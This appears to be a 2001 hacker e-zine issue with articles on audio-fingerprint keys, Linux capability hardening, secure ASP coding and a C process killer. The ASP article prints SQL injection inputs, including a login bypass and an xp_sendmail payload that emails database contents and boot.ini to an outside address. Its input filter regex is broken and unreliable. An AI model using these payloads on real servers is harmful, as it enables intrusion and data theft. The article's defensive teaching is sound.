..... ..........................[_] ::: ::: ::: ....... : .... ........ ::: ........ :::..... ... .... ........ ........ ........ ::: ::: :::: ::::: ::: :::: .. :::: ::: :::: ::: :::: ::::.::: :::.:::: .::: ::: :::: ::: :::.:::: :::.:::: :::.:::: ::: .... ::: :::..... : ::::.::: ..:[ issue 8 ]:.......: ................: : .......[ ]............................................... : : : Official Web Site - http://infosurge.rendrag.net : : : : Official Submissions - phase5@cmdrkeen.net : : Issue Editor - lym@thepentagon.com : : : :..[_].............................................[_]..: : Issue #8: 02/03/2001 : : :. :.:[ ] infosurge - we put the leet in obsolete : .: .............................................: : ......[ ]...................................................................... : : : Contents Author : : ---------- -------- : : : : #01 Using digital audio fingerprints in encryption - jestar : : #02 Hardening a Linux system with Capabilities - fyre : : #03 Secure Web Applications On Windows NT with ASP - black-hand : : #04 An automated process killer for Linux (in C) - icebsd : : #05 Phone extension warning device - Black_Smurf : : #06 UNIX Security - lymco : : #07 Example configuration of an OpenBSD firewall - aphex : : #08 History of 3d acceleration - Maticles : : : : TOTAL - 99kb : : : :..........................................................[_]................: : .......: : ....................................................[ ]....................... : : : #01 Using digital audio fingerprints in encryption - jestar : : ---------------------------------------------- : :.[_]........................................................................: : ...: : : Ok, it's been a while since I've written anything and I honestly dont : know if this is being pursued or has been written up by anyone else but : a quick search and also my research on fingerprinting schemes didn't turn : anything up. I'm crapping on, so to cut it short this is my disclaimer : and if im stealing any ideas you've already thrown out to the world I can : assure you I didnt know, if you wanna pursue me any further than that I : suggest fucking off. : : Ok onto the article. Just recently I was putting a bit of thought into : the current encryption schemes out there and on key distribution as well : as key generation and I remember seeing on a news site that there was : a group of people working on an algorithm that would boil any audio : file down to a digital signature representing that piece of audio. : This signature would be unique to each song, but not to each recording : of that song. What that means is that if you were using a song, the : fingerprint created from an audio file taken from the radio *should* : be identical to one created from a cd. Whether this turns out to be : true is another matter altogether. The group in question is TunePrint : (www.tuneprint.com) I guess if your interested you probably want to take : a gander at the site now before continuing with the article. : : Heres the idea. You take your plaintext message and think "well, I want : to send this to mum but I dont want the NSA peeking at it" (I'm sure : we all like to send heavily encrypted shopping lists to our mothers) : so you decide to encrypt it (that'll foil them *cough*). Now currently : you would probably use some sort of public/private key deal which is : all well and good, but there's still the matter of key transfers etc. So : say instead you decide to take a fingerprint of your mums favourite : song (probably something by the rolling stones or an 80's hair band, : unless your phase in which case its probably 'i sucked a lot of cock to : get where i am' by regurgitator) and you use the generated fingerprint : to encrypt the message. You then send the ciphertext to your mum and a : few days later phone her up and tell her what song it was encoded with : using some ultra cool oh no black helicopters and sunnies covert message, : probably "i really like this new song ...... you should listen to it". : She knows this is the key now and creates a fingerprint which she then : uses to decode it. Wether or not she then has to eat the fingerprint, : audio file and plaintext message is up to you. : : Of course there's a few problems with the idea put forward here, the : main one being that the digital fingerprinting tech in question could : be vapourware, or may not end up being as robust as they are hoping, : making variance in fingerprints too great to actually be useful. Also it : would require previous setting up of the way to let the other part know : what audio was used, but once again, I'm just throwing out some ideas I : had. If you have any comments or suggestions, or just want to tell me I'm : dreaming drop me a line at jestar@rendrag.net and all messages will be : given the appropriate attention (take that as you will). : :.... : ...[ ]........................................................................ : : : #02 Hardening a Linux system with Capabilities fyre : : ---------------------------------------------- : :.[_]........................................................................: : ...: : : Introduction : ============ : : Linux 2.2[1] introduced an important new security feature called : `capabilities', which, if used properly can both reduce the dependence of : some programs on root privileges, and at the same time make the superuser : far less powerful than they would be on a traditional UNIX system. : : In this article, we're going to discuss how to use capabilities to harden : a Linux system; that is, assume there are going to be vulnerabilities and : work out a way to reduce the damage potentially caused by them. : : : [1] It was Linux 2.1 that introduced capabilities, but 2.2 was the first : stable series to include them, and the bounding capability set idea took : until .11 to make it in. : : : Capability List : =============== : To whet your appetite with what capabilities can do, here's a list of the : capabilities supported by Linux 2.4.1 (the current stable kernel as of : this writing): : : Name Meaning : --------------- --------------------------------------------------- : CAP_CHOWN Allow changes to user and group ownership of files. : CAP_DAC_OVERRIDE Override all DAC restrictions. : CAP_DAC_READ_SEARCH Override all read/search DAC restrictions. : CAP_FOWNER Override all restrictions about file ownership : CAP_FSETID (not implemented) : CAP_KILL Override restrictions on sending signals to : processes not owned by the current effect user id. : : CAP_SETGID Allows setgid(), setgroups(), etc. : CAP_SETUID Allows setuid(). : CAP_SETPCAP Allows transfer/removal of capabilities from : current process to another process. : : CAP_LINUX_IMMUTABLE Allow modification of immutable (+i) and : append-only (+a) ext2 filesystem attributes. : : CAP_NET_BIND_SERVICE Allow binding TCP and UDP sockets to port numbers : below 1024. : : CAP_NET_BROADCAST Allow broadcasting. : CAP_NET_ADMIN Misc. network admin functions, most notably setting : promisc. mode. : : CAP_NET_RAW Allow use of raw sockets. : CAP_IPC_LOCK Allow locking of shared memory segments, and : disabling paging. : : CAP_IPC_OWNER Override IPC ownership checks. : CAP_SYS_MODULE Insert/remove kernel modules, modify bounding cap. : set. : : CAP_SYS_RAWIO ioperm/iopl access, USB. : CAP_SYS_CHROOT Allow the chroot system call. : CAP_SYS_PTRACE Allow ptrace of any process. : CAP_SYS_PACCT Allow control of process accounting. : CAP_SYS_ADMIN Misc. admin features, including mount, setting host : and domain names, random device, disk quotas, other : hardware config changes. : : CAP_SYS_BOOT Allow system reboot, halt, etc. : CAP_SYS_NICE Allow raising priority of this and other processes. : CAP_SYS_RESOURCE Override resource limits, disk quotas, etc. : CAP_SYS_TIME Allow setting of system clock. : CAP_SYS_TTY_CONFIG TTY device configuration. : CAP_MKNOD Allow special files to be created. : CAP_LEASE Allow taking leases on files. : : 2.2 series kernels seem to support all of these capabilities, with the : exception of CAP_LEASE, which is new for 2.4. An up-to-date list of : capabilities with brief descriptions is usually available in : /usr/include/linux/capability.h. : : : Bounding Sets : ============= : : Linux 2.2.11 introduces the concept of `bounding capability sets', which : can be used to remove certain capabilities so that no process can use : them, not even ones own by the superuser. The only way to get the : capabilities back[2] is to reboot. This feature can be used to limit what : a cracker can do if they somehow get root on your system. : : Some examples: : * Stop script kiddies clobbering your system logs (as is their habit) by : making the log files append-only (chattr +a) and removing the : CAP_LINUX_IMMUTABLE capability. : * Stop LKM rootkits from functioning by disabling CAP_SYS_MODULE. : * Stop sniffers being run on a compromised machine by removing : CAP_NET_ADMIN and perhaps CAP_NET_RAW. : : The command most often used to manipulate the bounding capability set is : lcap, written by spoon@ix.netcom.com. It's available for download in : source and RPM formats for download from : http://home.netcom.com/~spoon/lcap/download/. If you're using the current : unstable dist of Debian (sid), you should be able use apt-get in the usual : way to install lcap. The examples in this article assume lcap 0.0.3, but : any later version will do. : : To use lcap, type 'lcap' followed by the name or names of capabilities you : want to remove. For example: : # lcap CAP_NET_RAW : will remove the raw socket capability, breaking among others ping, : traceroute, and tcpdump for even the superuser. But before you start : playing with lcap yourself, read on for some potential pitfalls and tips. : : The most common place to modify capabilities is in your init scripts, : after all privileged daemons have been launched and the hardware : configured. I run lcap from rc.local right after tuning my hard drive : parameters with hdparm (which requires hardware access). I shouldn't need : to point it out, but don't experiment with capabilities on production : machines. Chances are something will go wrong and you'll be forced to : reboot (or worse!). : : There are a number of common problems encountered by those using bounding : capabilities, and nastiest of these usually show themselves when shutting : down or rebooting the system. Removing CAP_SYS_ADMIN, for example, will stop : you being able to unmount the filesystems, potentially resulting in : corruption or other damage. If CAP_SYS_BOOT is removed, the system will : refuse to reboot or power down. This may cause damage on some hardware, : but not unmounting the filesystems may be worse. Don't play with : capabilities on production machines, or bad things may happen. : : : [2] Only if the right capabilities are set. Patrick Reynolds demonstrates : in a post to Bugtraq entitled "Linux capability bounding set weakness" how : to get capabilities back if CAP_SYS_RAWIO and CAP_SYS_MODULE are not : disabled. As he suggests, you should always remove these capabilities if : you've removed any others. : (Ref: http://archives.neohapsis.com/archives/bugtraq/2000-06/0276.html) : : : In Practice: Securing the Log Directory : ======================================= : : In this example, we'll make it so that even the superuser cannot do : anything but append to the system logs - once a message is logged, it's : very difficult to remove it (at least from a remote machine). : : To begin with, we make our log files append-only with the chattr command: : # chattr +a /var/log/* : : Then, we make the /var/log directory immutable (ie. no changes are : allowed): : # chattr +i /var/log : : Finally we remove the CAP_LINUX_IMMUTABLE capability from the kernel, : which allows changing of +a/+i bits on files, and remove the other : capabilities that are always required (see footnote in previous section : for an explanation): : # lcap CAP_LINUX_IMMUTABLE CAP_SYS_RAWIO CAP_SYS_MODULE : : We're all done. If you didn't encounter any errors while executing the : above commands, your log files should be fairly well protected. Try : removing one to make sure it's not possible, then try using logger(1) to : log a message to make sure syslogd can still write to the log files. : : Note: making /var/log immutable and the files in it append-only breaks the : log rotation features present in many Linux distributions. I don't know : any (secure) way around this. : : : Conclusion : ========== : : Although the current Linux capabilities section is far from perfect, it : definitely does `raise the bar', and may confuse and deter unskilled : crackers (our friends the script kiddies). The look on Joe Haxor's face : when he tries the script kiddie staple command `rm -rf /var/log' and it : fails would be priceless. : :.... : ...[ ]........................................................................ : : : #03 Secure Web Applications On Windows NT with ASP - black-hand : : ------------------------------------------------ : :.[_]........................................................................: : ...: : : By black-hand black.wiretapped.net : : ASP (Active Server Pages) is a server-side scripting environment developed : by Microsoft for IIS servers on Windows operating systems. ASP is used to : create dynamic web pages and is the glue between components in creating : large web-based applications. By default, IIS will handle all files : with the .asp extension as ASP scripts, and pass these scripts through : components and applications to handle the server side scripting. ASP has : the capability to integrate multiple scripting and markup languages, : as well as technologies such as COM and Java. The default scripting : language assumed in ASP scripts is VBScript, a scripting language based : upon Visual Basic. : : Using ASP, it is possible to generate very flexible, dynamic and large : web based applications, integrating backend web processing and storage : with client-side (front-end) scripting and HTML. : : The level of security in an ASP application or web site is dependent upon : the developer. There are no built-in mechanisms in IIS to audit and monitor : intrusions or misuse of a web based application. A security audit of code : should be carried out as part of the testing and debugging procedure of : a project. This paper aims to outline common mistakes in ASP programming : that an attacker can use to compromise system data, and how to develop good : programming and administration practices to defend against these attacks. : : This document will assume that you have some knowledge of basic scripting : and/or ASP pages. : : : Basic ASP ---------- : : When deciding upon what tool to use to develop a project, an ASP : developer is faced with a number of choices. Larger IDE's (Integrated : Development Environments) take a lot of the work out of writing ASP, as : common functions and procedures can be dropped into the project easily : (such as tables, database connections etc.). A more 'purist' approach : would be to use a simple text editor and other individual programs to : assist in the development process. There are advantages and disadvantages : associated with either, and it is usually up to the developer to make : their own decision based on what they are comfortable with. : : The following is a basic ASP page: : : <% : response.write "Hello world" : %> : : The above script should produce the words "Hello world" printed on the : screen. The following HTML would have been produced by the server and : sent to the client. : : Hello world : : So what happened? The client made a request for an ASP script, IIS passed : this script through the relevant handler and interprets all scripts : between the <% %> tags. These are ASP opening and closing tags, everything : between these tags in an ASP script will be interpreted as VBScript by : default. Next, the VBScript interpreter told the response.write object to : print back the parameter passed to it ("Hello world") to the client. No : part of the server-side script is seen by the client - the client only : sees the output result of operations conducted on the server. : : Scripting can be used on the server side to make output dynamic. An : example would be content for a site being extracted from an SQL server, : or from a file. Another example would be to increment a counter each time : a page is fetched, so that records of numbers of visitors to that site : can be maintained. : : The following script will print a loop : : : <% for x=1 to 10 %> : Printing this text <%=x%>
: <% next %> : : : : : This will produce the following output to the browser : : Printing this text 1 Printing this text 2 Printing this text 3 .. : : From that example we can see that there can be multiple instances of : server-side code within an ASP script, and that a function can span : multiple code sections. Printing the variable x was achieved by calling : the variable with an = sign immediately after the opening script tag. : : : User Input ---------- : : The previous example pages were rather dull. To make a page more : interactive would require input from the user on the client-side. The : requirements for user input are a client-side HTML form to pass data to our : ASP script, and then the server-side code within the ASP script that will : then process it. Web-based forms are a popular method to obtain information : from users. A simple example of a HTML page with a form follows here: : :
: Username:
Password: :

:
: : That HTML will produce a simple login screen that will submit the values : of the two fields (username and password) to the logon.asp script when the : "Login" button is pressed. : : With logon.asp, we have to be able to accept this input into the script, : and react accordingly. The inputs into the script are the username and : password entered by the user at the previous HTML page, and the output : is either going to be "access allowed" or "access denied" depending on : the username and password combination entered. : : Firstly, the user input is taken into the ASP script and stored in : variables using the request.querystring object. : : <% : Dim username, password ' declare variables : : uname = request.querystring("username") pass = : request.querystring("password") : : This will take the values passed to the script from the HTML form and : place them into the uname and pass variables respectively. Secondly, we : decide based on the value of these variables what output we are going to : produce and inform the user. : : if uname = "user" and pass = "pass" then : response.write "access allowed" : else : response.write "access denied" : end if : %> : : If the passed in username is "user", and the password is "pass", then the : user will be informed that their login was allowed, otherwise that : their login was denied. Of course, after being shown that the user has : logged in, they will proceed through to a members or otherwise normally : restricted section of the site, and users whose login was denied will be : redirected back to the main HTML login screen to attempt again. : : : File Access ------------ : : The FileSystemObject object allows access to files stored on the : server. The following example will write a file to the system. Note : that it is writing the file to the server drive, not to the drive of the : client connecting. : : <% Dim fso, test Set fso = CreateObject("Scripting.FileSystemObject") Set : test = fso.CreateTextFile("c:\\testfile.txt", True) test.WriteLine("This : is a test.") test.Close %> : : If you open testfile.txt in a text viewer, you should be able to see the : "This is a test." line that we wrote to it. : : Reading files is also very similar, we can read the file line by line or : character by character and store it into variables to use the data. : : Dim fso, f Set fso = CreateObject("Scripting.FileSystemObject") Set f = : fso.OpenTextFile("c:\\testfile.txt", ForReading) Test = f.Read(5) : : The variable "test" will contain the first 5 characters of the testfile.txt : file. : : The FileSystemObject can also be used to add, change, move, create and : delete files and folders. This ability makes the FileSystemObject very : powerful and useful. : : : Database Access ---------------- : : Databases are used to store data in an organized manner, making it easier : and faster to store and retrieve records. In VBScript there are a number : of data access methods, with the most common for server-side access being : Microsoft ADO (ActiveX Data Objects). : : Using ADO, you can dynamically create an object to store, manipulate and : navigate through data returned from a database. : : The following code creates an ADO connection, and then associates a new : recordset object with the connection. : : Dim connection as New ADODB.Connection connection.Open ConnectionString, : UserID, Password : : Dim recordset as ADODB.Recordset Set recordset = New ADODB.Recordset : recordset.Open Source, ActiveConnection, CursorType, LockType : : The "source" option in the recordset defines the SQL query set to be : returned into the object. We can then iterate through the returned : recordset, and manipulate the data. The following example will print a : single field from each record on a line from a returned recordset: : : set RECORDSET = CreateObject("ADODB.RecordSet") : RECORDSET.ActiveConnection = "ODBCCONNECTION" RECORDSET.CursorType : = 0 : : RECORDSET.source = "select field from table" : : RECORDSET.Open If RECORDSET.BOF <> True or RECORDSET.EOF <> True then : Do Until RECORDSET.EOF : Response.write RECORDSET("field") & "
" : Loop end if : : : : Securing User-Supplied Input ---------------------- : : In a previous example, we saw a simple demonstration of an ASP script : handling a login screen and authenticating a user. Very rarely would you : see an example in the real world that functions in the same way. A more : stable and secure solution would have to check the user input passed : as well as accounting for a lot of other factors. : : An attacker can manipulate the data passed to the script so that unexpected : events occur. An "unexpected event" can be used by an attacker to access : a restricted "members" sections, or to access database information. : : The following is a typical script used to handle logins by querying a : database to extract username/password information: : : Dim uname, pass : : uname = request.querystring("username") pass = : request.querystring("password") : : set LOGIN = CreateObject("ADODB.RecordSet") LOGIN.ActiveConnection : = "ODBCCONNECTION" LOGIN.CursorType = 0 : : LOGIN.source = "select * from users where uname='"&uname&"' : and _ pass='"&pass&"'" : : LOGIN.Open If LOGIN.BOF = True or LOGIN.EOF = True then : response.redirect "default.asp" ' failed login : else : response.redirect "members.asp" ' logged in : end if LOGIN.Close : : : The username and password parameters are inserted into an SQL query, : and then the results of this query are returned into a recordset. : If the username and password are found, then it will return the full : record from the database from that user within the recordset. If the : username and password combination are not found then it will return an : empty recordset. The if statement checks checks to see that there has : been a record returned in the recordset. If the recordset is not empty, : it means that the username and password combination executed by the SQL : query return a record. Otherwise the username and password combination : did not return a valid user record. : : A successful login will redirect the user to the members.asp page, a failed : login will redirect the user to default.asp. The username and password : parameters are passed to the ASP script via a web form, or manually passed : to the script by appending variable names and values to the URL. : : http://www.server.com/login.asp?username=kevin&password=test123 : : The above example will pass the values "kevin" and "test123" as the : username and password, and these values will be directly stored into our : server side variables. : : The script then takes the values that are passed and inserts them : directly into the SQL query, meaning that we are able to pass the script : values that directly modify the SQL query that is executed. : : As an example, we will pass the following to the script, and then : investigate how the SQL is executed and what result is produced: : : username: 1 password: 1' or pass <> '1 : : The code used to construct the SQL query is as follows: : : "select * from users where uname='"&uname&"' and pass='"&pass&"'" : : If the query is then constructed with the variables that we are passing : in, the following query will be executed. : : "select * from users where uname='1' and pass='1' or pass <> '1' : _ _________________ : : The two inputs that we passed into this query are underlined, and it : can be seen that because of the password that we have supplied : we have as a result returned every record in the database, thus allowing : us access to members.asp without a real username or password. This is : because the SQL is extracting every record where pass is equal to 1, : as well as every record where pass is NOT equal to 1, which of course, : is every record in that table. : : The Microsoft SQL server also supports being able to execute multiple : SQL commands on one line and in one query. So in the previous example, : with a bit of tinkering we can INSERT new records or DELETE records. As : a more complex example, Microsoft SQL server comes with some stored : procedures that will email the result of an SQL query to an email : address. The following is the syntax for that query, we simply pass it : into our password field and it will execute as part of the whole query. : : EXECUTE master.dbo.xp_sendmail "suspects@2600.org.au","","select * from : sysdatabases", "C:\\boot.ini" --' : : Passing those parameters to the stored procedure will email the results : of the query "select * from sysdatabses" to suspects@2600.org.au. As an : extra bonus, the xp_sendmail stored procedure allows you to attach any : file to the email from the system. In the above example we have attached : c:\\boot.ini to the email. The sysdatabases table is a system table that : contains the names and information of all databases on the SQL server, : which can come in handy. Further investigation into the system databases : and stored procedures that are installed by default with Microsoft SQL : Server will result in more possibilities, such as being able to change : permissions and executing commands on the server. : : : Filtering Input ---------------- : : As a solution to unexpected passed input, we can develop a function to : wrap around variables containing user input to filter out characters that : are deemed "unnecessary" or dangerous. : : The following function will strip unnecessary characters from the passed : input. : : Function SQLFilter(str) : Dim regEx Set regEx = New RegExp regEx.Pattern = "A-Z,0-9" : regEx.IgnoreCase = True SQLFilter = regEx.Replace(str, "") : End Function : : : IIS Security Holes. -------------------- : : There are a number of generic IIS security holes that could assist an : attacker in compromising a remote database and system. These security : holes can be used to view the full source to a server side scripts. : Thus a developer should never assume that the script source is secure : when developing their site or application. : : Common mistakes include servers hosting sample scripts and directories, : or running versions of remote data access and IIS services that are known : to contain security holes. : : These holes are common and are discussed in my IIS security article : located at: : : http://black.wiretapped.net/iis.txt : : : More Programming Errors ------------------------- : : It is common for a developer to include test and debug modes into : applications for development and debugging purposes, and this is only : secured by the fact that in a production environment a remote user would : not be able to view server-side code. : : One such example is an online store that had a debug mode for testing : purposes that allowed a user to specify a discount on product and view : debug information, such as SQL statements. Enabling the debug mode was : as simple as parsing the variable "debug" to equal 1 as such : : http://www.server.com/shop.asp?productid=435&debug=1 : : This was uncovered by using an IIS security hole to view and analyze : the source to the ASP scripts. At the top of the ASP script there was : something similar to : : <% : Dim debug debug = request.querystring("debug") : : [..] : : if debug = 1 then : response.write RECORDSET.Source : end if : %> : : Such common programming errors are common and can lead to interesting : finds by curious and persistent web surfers. : : Other possibilities include scanning for backups of server side scripts : by appending common backup extensions to filenames. It is common for : some development environments and editors to create backups of files, : or for administrators to manually create backups before making changes. : : An example would be UltraEdit's (www.ultraedit.com) default practice of : creating a copy of each file open with a .bak extension. Since the .bak : extension has no default association in IIS, it can be viewed as a normal : text document when it is requested in a web browser. : : A document on this is available on my website at: : : http://black.wiretapped.net : : : Session State --------------- : : Once a user has logged in, it is important to track the status and : permissions of each user on the server side. There are a number of methods : that can be used to do this, including cookies, IIS authentication, or : server side session value storage. At a simple level, keeping track of : session state could simply mean checking a Boolean value to see if the : requesting user has permissions to that resource. : : On login, the application would set a Boolean value to true If the login : was sucessful: : : LOGIN.Open If LOGIN.BOF = True or LOGIN.EOF = True then : session("logged") = 0 : response.redirect "default.asp" ' failed login : else : session("logged") = 1 response.redirect "members.asp" : ' logged in : end if LOGIN.Close : : A successful login would set the server-side variable "logged" to be : equal to one. A new set of server-side variables are spawned for each : user, and are identified at the server-web browser level using unique and : random 64-bit strings generated by the server, making the probability of : hijacking another users session difficult (assuming that the method of : random number generation used by IIS is "random enough"). : : When access permission to a restricted resource or differentiation between : different levels of user is required, we simply read out the value stored : in this session variable. : : Such an example would be to make a simple check at the top of a page that : the developer wishes to restrict access to. : : <% if session("logged") <> 1 then : response.redirect "default.asp?error=login" : end if : %> : : If the session variable "logged" had been set to 1 during login time, : then access to the rest of the script would be allowed, otherwise the : request would be redirected to the default page and an error recorded. : : This method prevents "backdoor" / "deep linked" access to parts of a : site, and ensures that only users with particular privilege level are : allowed access. The checking routing can be placed in an include file, : and included as part of each script where access has to be tracked: : : : : Other variables that are commonly stored in session variables include : usernames, and different levels of permissions. Session variables are : cleared on the server after a default 20 minutes of inactivity. : : : Microsoft SQL Server --------------------- : : A very common but often unknown problem with Microsoft SQL server 7.0 is : that it contains a default "sa" account with a blank password. To exploit : this, an attacker simply uses the SQL management console to connect to : your SQL server and view databases information, or change permissions : and execute system commands using the extended stored procedures. : : It is extremely important that this default account is removed, and that : access to port 1433 (the port that the Microsoft SQL server binds to) : is blocked from all hosts except the IIS Server. In an ideal situation, : the SQL server would be in a non-routable private address range away from : a live network segment to restrict remote access. : : There is now a Linux command line client that can be used to access : and scan for Microsoft SQL servers called linsql.c, it is available for : download from packetstorm (http://packetstorm.securify.com), it requires : the freeTDS library. : : Conclusion ------------ : : Despite all the hype, ASP is and can be relatively secure. All it takes : is good programming practice and a secure and patched IIS server. : : The purpose of this document was to be a basic introduction to secure : ASP programming practices, and is meant to compliment reference material : (http://msdn.microsoft.com) and programming experience. : : Copyright 2001, black-hand : (black@wiretapped.net, http://black.wiretapped.net) : This document may only be reproduced in full. : :.... : ...[ ]........................................................................ : : : #04 An automated process killer for Linux (in C) - icebsd : : ---------------------------------------------- : :.[_]........................................................................: : ...: : : An automated process killer for Linux (in C) : -- icebsd : ======================================================= : : : As fun as system administration goes, most of the chores done by a system : administrator are often 1) redundant, 2) unimportant, 3) more often than : not, they get blamed for the consequences of their actions. So the : question that came into my mind today (today being a boring Saturday), was : whether or not a program could be made to emulate the task of your typical : bastard administrator from hell (BAFH - a spin off from BOFH). : : The idea was to create a process killer which would kill processes based : on certain attributes of the process. The reason for using Linux was : obvious: the /proc filesystem is easy to use. : : In my initial thoughts of construction, I had devised the main objectives : of the program: : : 1) It must raise it's priority higher than other programs. : - i.e. posix scheduling on linux, or setpriority() : : 2) It must be quick, and use a small amount of memory. : - i.e. no dynamic memory, e.g. link lists :) : : 3) It doesn't have to be run by root, although running the program : as root would *really* provide you with an automated BAFH. : - i.e. johnsmith can run it too. : : 4) It should have emergency shell access, with higher priority : than the program. : : 5) It would obviously need to read the /proc filesystem, and : calculate the appropriate values and compare them with the user : defined threshold levels. : - i.e. /proc fs stats, and algorithms. : : 6) Finally, it should not kill processes run by "root" unless the : user defined it to do so. : : I will now write about the topics listed above which describe the program : in a non-reproducing way, in the hopes of the reader being able to make : the program themselves before actually seeing mine. (source attached at : the end of this text file.) : : 1) Raising Priority : -------------------- : Raising the priority of a process can be done in two ways on a linux : system. One way is via the nice() system call, which allows the user to : modify the priority of the program to a higher state, but still allows the : kernel to drop its priority back down. : : Another way is to use the POSIX scheduler functions to elevate the : program's priority to near "real-time" scheduling. Once it is in this : mode, it will have higher priority than any other program not in real-time : mode and cannot be dropped back down by the kernel. This is also known as : a static priority. : : To do this, you would use: : : : struct sched_param sp; : sp.sched_priority = priority; /* assign priority */ : sched_setscheduler(pid, SCHED_FIFO, &sp); /* posix function */ : : : In my program, I wrapped that into another function called : raise_priority(). This function uses the generic UNIX function : setpriority() as a backup if posix doesn't work (which wouldn't : happen on linux systems anyway). : : 2) Small and fast. Nothing fancy : -------------------------------- : Because the program is now running at a scheduling level which could cause : the system to slow down or crash, ideally a small and fast program would : be better than a comparatively larger and slower (yet more fancy) program. : : Initially, the idea is to read from the /proc without having to store too : much information in the RAM, such as using a linked list or something : similar. The functions to read from directories such as scandir() would be : inappropriate. A simple call to readdir() would suffice. Let's see why. : : : NAME : scandir, alphasort - scan a directory for matching entries : : SYNOPSIS : #include : : int scandir(const char *dir, struct dirent ***namelist, : int (*select)(const struct dirent *), : int (*compar)(const struct dirent **, const struct dirent : **)); : : : Scandir looks very convenient. It reads a string in the first argument, : and provides the vector namelist with a lovely pre-malloc() data which you : have probably free later on. Convenient, but expensive. : : : NAME : readdir - read a directory : : SYNOPSIS : #include : : #include : : struct dirent *readdir(DIR *dir); : : : This call is obviously better for this program, as there are less data : allocated in RAM as readdir() returns a static structure. However, this is : also less convenient as far as searching or sorting goes, but for this : program it is fine. : : 3) And the question is: to run as root, or not to run as root. : --------------------------------------------------------------- : Obviously, to raise your priority you need root access, but to have the : functionality for the rest of the program, you can still use a normal : user. So a simple compromise was made: you can run as both, but you can't : do as much if you run the program as a normal user. i.e. you can only : automatically kill your own processes. : : 4) A 'real-time' shell : ---------------------- : A real-time shell is easily provided by forking the process and elevating : the process to maximum priority. This provides the user with the ability : to kill it's own program, should it happen to spin out of control. : : This was done in my program by calling raise_priority(1) instead of : raise_priority(0) : : 5) Getting something useful from /proc : -------------------------------------- : Firstly, to quickly brief on the /proc filesystem: : : * Every numeric directory is a pid (process id) : * Inside a pid pseudo-directory, there are files which correlate to the : attributes of the process. : * The (UID) owner of the pseudo-directory is the owner of the process. : : In particular, the "stat" file is the one we're after. This file contains : the attributes for start time, total cpu time, etc. Another file also : important is the "/proc/uptime" which you have to use to calculate the : values, as the /proc filesystem basis it's timings on when the system was : "started". They also judge their timings based in 1/100th of a : second. This also means the uptime and process timers will wrap around : eventually. : : At first glance, it's ambiguous. But after looking through the procps : package, which contains the source code for "ps" and "top", it wasn't too : difficult to assimilate the structure. : : bash$ cat /proc/1/stat : 1 (init) S 0 0 0 0 -1 256 43 7891 160 18324 1 338 279 269 0 0 -1 0 30 : 901120 86 2147483647 134512640 134529764 3221225284 3221224232 1073873768 : 0 0 3622886140 671818755 1236245 0 0 : : The first value is the PID of the program (which should also be the : directory name too.) The word in parenthesis is the name of the program, : as provided when executed via an execve() call. : : The "S" character is the state character. It stands for "sleep". Most : processes tend to do this, that is, idle and sleep. Other process have "R" : which indicate that it's running and using CPU time. : : After the state character, we'll refer to it the 1st real value, since : the values after the state character that we really care about, so to : make things short I'll only explain the values you need to know. : : The 11th and 12th value are utime and stime respectively. Combined, they : provide the attribute for "total cpu time actually used". This is not the : same as "length of program time", which is described by the 19th value. : : The reason for this difference is that the "total cpu time actually used" : is often less than the "length of program time" because of multi-tasking, : which basically means the process only gets a slice of cpu-time, and not : hog it 100% of the time. : : Two other values need to be known. That's the system uptime, which is from : "/proc/uptime" -- it's the first value. And the current system time, which : is gained via the C library's time() function. : : From there on, we can devise a simple formula to calculate the values we : need: : : process_seconds = ((system_uptime * 100) - p_start) / 100; : process_tstart = system_time - process_seconds; : process_total_time = p_utime + p_stime; /* this is : in 1/100th second */ : : * process_seconds is the total length of time the program has been : running, (in seconds of course). The 19th value we got (from : /proc/###/stat) was actually a 1/100th of a second time value based from : the start of system. Hence the usage of system_uptime in the formula : above. : : * process_tstart is the start time, in time_t format (i.e. based on the C : library's time(), instead of the system uptime) : : * process_total_time is the total amount of CPU time that has actually : been used in 1/100th of a second. : : From those values, we can calculate the PCPU (percentage of the cpu used : by the process) by dividing the process_total_time (once you convert it to : seconds) with process_seconds and multiplying by 100 to get a percentage. : : Because process_total_time is in 1/100th of a second, it's value is as if : it had already been multiplied by 100, so we don't need to do it. : : pcpu = process_seconds ? (process_total_time / process_seconds) : : 0.0; : : (The ?-condition is to check to see if process_seconds is zero, to prevent : a division by zero error.) : : By using the above values, you can check a user defined threshold for : killing or nice() the process to something more appropriate. : : : /* check for nice threshold */ : if ((process_seconds < NICE_TIME) || (pcpu < NICE_PCPU)) { : continue; : } : else { : /* nice() the process using setpriority() */ : /* note: should probably check via getpriority() : * but it doesn't really matter. : * since you don't save a system call either way. : */ : if (setpriority(PRIO_PROCESS, pid, NICE_VAL) == -1) { : perror("setpriority - nice failed"); : } : } : : /* check for kill threshold */ : if ((process_seconds < KILL_TIME) || (pcpu < KILL_PCPU)) { : continue; : } : else { : /* kill the process */ : : if (kill((pid_t) pid, KILL_SIG) == -1) { : perror("kill() failed"); : } : else { : printf("Process has been killed\\n"); : ... : : : 6) The obvious. : --------------- : : As stated previously, the program should be wary of killing processes that : have a UID of 0, because they are "root" owned processes which could be : quite nasty if they were killed. Obviously, another if-condition could : have been used to determine whether or not the process was below a certain : UID to make sure all system processes are safe from this program. (e.g. : those running as "bin", "news"" or whatever). This has been left as an : exercise to the reader. : : Sysloging was achieved quite easily with syslog(), and was a miscellanous : feature I thought of nearing the end of the program's construction. : : Portability is a problem, obviously, since only a system with a /proc : filesystem could use this program. : : The TEST_ONLY option doesn't work, as I was too lazy to put in another : #ifdef somewhere. :) : : There are many possible extensions to this program that wasn't made, such : as keeping the state of the processes in memory to compare their PCPU : based on a shorter time interval instead of their lifetime, which : could have helped in calculating "surges" in CPU usage for logging or : other reasons. But for reasons #1 and #2, this was not planned. : : Another fun extension would be to find out if the process has child : processes, and kill them if they exceed a user-defined limit. This would : allow it to kill off forkbombs, etc. : : Source : ------ : The source "process_killer2.c.gz" is attached at the end of this textfile, : so to output it to a file, use 'uudecode' and 'gzip' like this: : : uudecode infosurge-8.txt ; gzip -dc process_killer2.c.gz : : where "infosurge-8.txt" is the filename of this text file. : : Conclusion : ----------- : : "Keep it simple: as simple as possible, but no simpler." : -- A. Einstein : : Whether you actually would use this program in the wild is up to you. : Considering that I wrote this program in a few hours, you should probably : take heed and look for bugs. : : As for whether or not the system administrator can pass the blame to the : program for its actions... remains to be seen. :) begin 664 process_killer2.c.gz M'XL("`5Q.SH``W!R;V-ED<4*7+3T^LC2RU MS=RYK\\]]48;'XD@DH&HDP"F8MB+<7+US?BY>5LP,_?1"HJQ+HHLK/A<+O= M#E9).4CSU5"$:2YB4$I4E*Q$E.#[QBNB-!G0N=<7U]-GDS/Q-BW%QMN)-(EW 